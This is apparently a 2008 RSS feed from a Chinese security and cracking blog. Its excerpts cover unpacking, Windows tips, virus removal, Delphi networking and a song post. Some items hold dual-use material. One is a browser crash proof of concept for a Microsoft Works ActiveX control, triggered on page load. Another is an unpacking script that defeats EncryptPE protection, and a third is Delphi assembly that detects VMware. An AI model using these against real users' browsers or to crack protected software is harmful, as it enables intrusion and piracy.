<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:wfw="http://wellformedweb.org/CommentAPI/">
  <channel>
    <title><![CDATA[[T4nk]-Q盗杀手|IE 0day|网页木马生成器|木马分析|最新病毒|脱壳破解]]></title> 
    <link>http://www.upx.com.cn/</link> 
    <description><![CDATA[[UPX]致力于研究最新漏洞.最新病毒和木马分析,不定期发布脱壳教程！]]></description> 
    <language>zh-cn</language> 
    <copyright><![CDATA[Copyright 2008, [T4nk]-Q盗杀手|IE 0day|网页木马生成器|木马分析|最新病毒|脱壳破解]]></copyright> 
    <webMaster><![CDATA[xs_soft#qq.com (T4nk)]]></webMaster> 
    <generator>LBS v2.0.304</generator> 
    <pubDate>Fri, 16 May 2008 15:55:25 +0800</pubDate> 
    <ttl>60</ttl>
  
    <item>
      <title><![CDATA[[脚本]EncryptPE V2.2007.12.1 S方式完美脱壳脚本]]></title> 
      <link><![CDATA[http://www.upx.com.cn/article.asp?id=185]]></link> 
      <category><![CDATA[+破解专栏+]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Sat, 03 May 2008 07:45:30 +0800</pubDate> 
      <description><![CDATA[<div class="quote"><div class="quote-title">引用 <u></u></div><div class="quote-content">// 注意：须设置忽略0EEDFADE异常<br />//运行结束以后alt+l查看记录显示oep和rva信息<br />//如果是dll文件请自行先载入dll入od以后下硬件断点7120964C，再次载入dll再运行脚本<br />//脚本自动寻找OEP,修复IAT，跳过注册框，修复ReplaceCode，修复EmbeCode，自动保存RVA重定位数据<br /><br />///////////////////////////////////////////////////////////////////////////////////<br />// FileName    :  EncryptPE_2007.12.1.txt<br />// Comment     :  EncryptPE V2.2007.12.1 S方式完美脱壳 0.2<br />// Environment :  WinXP SP2,LifeDbg V1.4, OllyScript 1.65.2 </div></div>]]></description>
      <wfw:commentRss><![CDATA[http://www.upx.com.cn/feed.asp?q=comment&id=185]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[[RAT]Espionage Against Pro-Tibet Groups, Others, Spurred Microsoft Patches]]></title> 
      <link><![CDATA[http://www.upx.com.cn/article.asp?id=184]]></link> 
      <category><![CDATA[+网络安全+]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Fri, 02 May 2008 20:07:41 +0800</pubDate> 
      <description><![CDATA[<div class="quote"><div class="quote-title">引用 <u></u></div><div class="quote-content">SAN FRANCISCO -- Malicious hackers beware: Computer security expert Joel Eriksson might already own your box.<br /><br />Eriksson, a researcher at the Swedish security firm Bitsec, uses reverse-engineering tools to find remotely exploitable security holes in hacking software. In particular, he targets the client-side applications intruders use to control Trojan horses from afar, finding vulnerabilities </div></div>]]></description>
      <wfw:commentRss><![CDATA[http://www.upx.com.cn/feed.asp?q=comment&id=184]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[[PE]Windows PE]]></title> 
      <link><![CDATA[http://www.upx.com.cn/article.asp?id=183]]></link> 
      <category><![CDATA[+操作系统+]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Thu, 01 May 2008 22:05:13 +0800</pubDate> 
      <description><![CDATA[<div class="quote"><div class="quote-title">引用 <u></u></div><div class="quote-content">Win PE深入研究<br />　　Windows PreInstallation Environment（Windows PE）直接从字面上翻译就是“Windows预安装环境”，微软在2002年7月22日发布，它的原文解释是：“Windows预安装环境（Windows PE）是带有限服务的最小Win32子系统，基于以保护模式运行的Windows XP Professional内核。它包括运行Windows安装程序及脚本、连接网络共享、自动化基本过程以及执行硬件验证所需的最小功能。”换句话说，你可把Windows PE看作是一个只拥有最少核心服务的Mini操作系统。微软推出这么一个操作系统当然是因为它拥有与众不同的系统功能，如果要用一句话来解释，我认为与 Win9X/2000/XP相比，Windows PE的主要不同点就是：它可以自定义制作自身的可启动副本，在保证你需要的核心服务的同</div></div>]]></description>
      <wfw:commentRss><![CDATA[http://www.upx.com.cn/feed.asp?q=comment&id=183]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[[经典]《We are the world》历史唯一一次的全球著名歌星同台演唱]]></title> 
      <link><![CDATA[http://www.upx.com.cn/article.asp?id=182]]></link> 
      <category><![CDATA[+经典回顾+]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Tue, 29 Apr 2008 22:22:26 +0800</pubDate> 
      <description><![CDATA[<div class="ubb-obj-div"><input id="bShowobjkko4" type="hidden" value="-1" /><a href="javascript:ubbShowObj('swf','objkko4','http://player.youku.com/player.php/sid/XNTIwODM2/v.swf','400','300');"><img src="http://www.upx.com.cn/styles/coffee/images/icon_media.gif" alt="Media" /> <b>点击播放/隐藏媒体</b></a><div id="objkko4"><a href="http://player.youku.com/player.php/sid/XNTIwODM2/v.swf" target="_blank">http://player.youku.com/player.php/sid/XNTIwODM2/v.swf</a></div></div><br /><br />《We are the world》介绍<br /><br />出场顺序简单介绍一下:<br /><br />1985年，迈克尔·杰克逊和莱昂纳尔·里奇共同谱写，由美国45位歌星联合演唱，昆西·琼斯负责制作的，为求援非洲饥民而义卖的唱片《天下一家》(We Are The World),震撼了亿万人的心，风靡全球。<br /><br />There comes a time when we heed a certain call 我们听到了一声召唤，(Lionel Richie 莱昂纳尔.里奇)<br />When the world must come together as one 全世界必须团结在一起！(Lionel Richie 莱昂纳尔.里奇&amp; Stevie Wonder史蒂夫.汪德)<br />]]></description>
      <wfw:commentRss><![CDATA[http://www.upx.com.cn/feed.asp?q=comment&id=182]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[[整理]磁碟机新变种手工查杀整理]]></title> 
      <link><![CDATA[http://www.upx.com.cn/article.asp?id=181]]></link> 
      <category><![CDATA[+网络安全+]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Tue, 29 Apr 2008 21:08:41 +0800</pubDate> 
      <description><![CDATA[<div class="quote"><div class="quote-title">引用 <u></u></div><div class="quote-content">手动剿灭磁 碟 机完整步骤<br /><br />准备工作：<br />1、WSYSCHECK、改扩展名为BAT文件，放桌面备用。<br />2、破坏DNSQ.DLL的指令保存为k.bat备用：<br />复制内容到剪贴板<br />代码:<br /><br />attrib -r -s -h &quot;%SystemRoot%\System32\dnsq.dll&quot;<br />ren &quot;%SystemRoot%\system32\dnsq.dll&quot; &quot;dnsq.d11.%random%&quot;<br />echo MZ &gt; &quot;%SystemRoot%\System32\dnsq.dll&quot;<br />attrib +s +r +h &quot;%SystemRoot%\System32\dnsq.dll&quot;<br /><br />3、劫持代码,存为img.reg放桌面备用：<br />复制内容到剪贴板<br />代码:<br /><br />Windows Registry Editor Version 5.00<br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows </div></div>]]></description>
      <wfw:commentRss><![CDATA[http://www.upx.com.cn/feed.asp?q=comment&id=181]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[[Vista] Vista命令大全 (大部分为通用命令)]]></title> 
      <link><![CDATA[http://www.upx.com.cn/article.asp?id=180]]></link> 
      <category><![CDATA[+操作系统+]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Tue, 29 Apr 2008 20:32:03 +0800</pubDate> 
      <description><![CDATA[<div class="quote"><div class="quote-title">引用 <u></u></div><div class="quote-content">(下面排列按A-Z)顺序排列<br /><br />一.win+(X)<br />其中win不会不知道吧,X为代码!<br />(1)Win+L 锁定当前用户.<br />(2)Win+E 资源管理器.<br />(3)Win+R 运行.<br />(4)Win+G （Gadgets）顺序切换边栏小工具.<br />(5)Win+U      轻松访问中心.<br />(6)Win+X      Windows移动中心.<br />(7)Win+Tab 启用 3D窗口切换.<br />(8)Ctrl+Win+Tab 用键盘控制 Flip 3D窗口切换其中有个停顿效果.可以有足够的时间进行选择!<br />(9)Win+break 开启系统属性窗口.<br /><br />二.Shell：command （外壳命令行）<br />以“Shell＋冒号＋命令”的格式，打开各种外壳文件夹:<br />(1)shell:AddNewProgramsFolder<br />(2)shell:Administrative Tools</div></div>]]></description>
      <wfw:commentRss><![CDATA[http://www.upx.com.cn/feed.asp?q=comment&id=180]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[[vm]Detect Virtual Machine 检测虚拟机]]></title> 
      <link><![CDATA[http://www.upx.com.cn/article.asp?id=179]]></link> 
      <category><![CDATA[+编程专栏+]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Sat, 26 Apr 2008 11:28:56 +0800</pubDate> 
      <description><![CDATA[<div class="quote"><div class="quote-title">引用 <u></u></div><div class="quote-content">program IsInVM;<br /><br />{$APPTYPE CONSOLE}<br /><br />uses<br />  windows;<br /><br />function InVMware: Boolean;<br />asm<br />    XOR     EAX, EAX<br /><br />    PUSH    OFFSET @@Handler<br />    PUSH    DWORD PTR FS:[EAX]<br />    MOV     DWORD PTR FS:[EAX], ESP<br />    MOV     EAX, 564D5868h<br />    MOV     EBX, 3c6cf712h<br />    MOV     ECX, 0Ah<br />    MOV     DX, 5658h<br />    IN      EAX, DX<br />    MOV     EAX, True<br />    JMP     @@NotHandle<br />@@Handler:</div></div>]]></description>
      <wfw:commentRss><![CDATA[http://www.upx.com.cn/feed.asp?q=comment&id=179]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[[IOCP]DELPHI中完成端口(IOCP)的简单分析]]></title> 
      <link><![CDATA[http://www.upx.com.cn/article.asp?id=178]]></link> 
      <category><![CDATA[+编程专栏+]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Thu, 24 Apr 2008 11:09:20 +0800</pubDate> 
      <description><![CDATA[<div class="quote"><div class="quote-title">引用 <u></u></div><div class="quote-content">用DELPHI开发网络代码已经有一段时间了！<br />我发现在网上用VC来实现完成端口（IOCP）的代码很多，但是使用DELPHI来实现的就比较少了。对IOCP讲的清楚的就更少了。在这里我把自己编写DELPHI下的IOCP写出来，希望对刚学完成端口的朋友有个帮助。<br />首先我们来了解一些在使用IOCP的时候需要使用的一些结构！<br />（1）：单IO数据结构<br />  LPVOID = Pointer;<br />  LPPER_IO_OPERATION_DATA = ^ PER_IO_OPERATION_DATA ;<br />  PER_IO_OPERATION_DATA = packed record<br />    Overlapped: OVERLAPPED;<br />    DataBuf: TWSABUF;<br />    Buffer: array [0..1024] of CHAR;<br />    BytesSEND: DWORD;</div></div>]]></description>
      <wfw:commentRss><![CDATA[http://www.upx.com.cn/feed.asp?q=comment&id=178]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[[Fwall]The truth about personal firewalls|个人防火墙的真相]]></title> 
      <link><![CDATA[http://www.upx.com.cn/article.asp?id=177]]></link> 
      <category><![CDATA[+网络安全+]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Wed, 23 Apr 2008 23:27:28 +0800</pubDate> 
      <description><![CDATA[个人防火墙的真相<br />翻译：syspro<br />声明：1、syspro翻译水平有限，有不当之请大家理解。如部分看不懂可以和原文对照。<br />      2、欢迎转载，但请不要漏掉原文作者和翻译者的信息。<br />      3、欢迎大家指出syspro翻译中的错误，syspro好改正。<br /><br />有多种方式来保护你的计算机免受恶意软件的侵害,比如软件防火墙,病毒和Rootkit检测软件等。所有这些防护软件都基于一些众所周知而几乎没有改进的技术，而且这些技术你也许已经知道，继承这些技术的安全产品也是不完善的。这样的后果通常是可怕的。然而这些安全公司却天真的认为他们的产品是最先进的，包含了最新的特性，是用户必备的。但是只要你透过他们的华丽的外衣就会看到，他们的Bug和错误甚至比你在学校的设计还要多。虽说生产一款产品首要的是好而强有力的广告。但沉重的广告和糟糕的测试结合在一起能向用户展示一些产品所谓的强大吗，能使其产生一种强烈的购买欲望吗？当然不行。<br />]]></description>
      <wfw:commentRss><![CDATA[http://www.upx.com.cn/feed.asp?q=comment&id=177]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[[poc]Microsoft Works 7 WkImgSrv.dll crash POC]]></title> 
      <link><![CDATA[http://www.upx.com.cn/article.asp?id=176]]></link> 
      <category><![CDATA[+网络安全+]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Wed, 23 Apr 2008 14:28:08 +0800</pubDate> 
      <description><![CDATA[<div class="quote"><div class="quote-title">引用 <u></u></div><div class="quote-content">dll版本7.03.0616.0  <br /><br />IE7+xpsp2 测试通过。<br /><br />转载请注明出处并保持完整性，谢谢。<br />t4nk www.upx.com.cn<br />&lt;html&gt;<br />&lt;head&gt;<br />&lt;title&gt;Microsoft Works 7 WkImgSrv.dll crash POC&lt;/title&gt;<br />&lt;script language=&quot;JavaScript&quot;&gt;<br />function payload() {<br />var num = -1;<br />obj.WksPictureInterface = num;<br />}<br />&lt;/script&gt;<br />&lt;/head&gt;<br />&lt;body onload=&quot;JavaScript: return payload();&quot;&gt;<br />&lt;object classid=&quot;clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6&quot; id=&quot;obj&quot;&gt;<br />&lt;/object&gt;</div></div>]]></description>
      <wfw:commentRss><![CDATA[http://www.upx.com.cn/feed.asp?q=comment&id=176]]></wfw:commentRss>
    </item>
      
  </channel>
</rss>
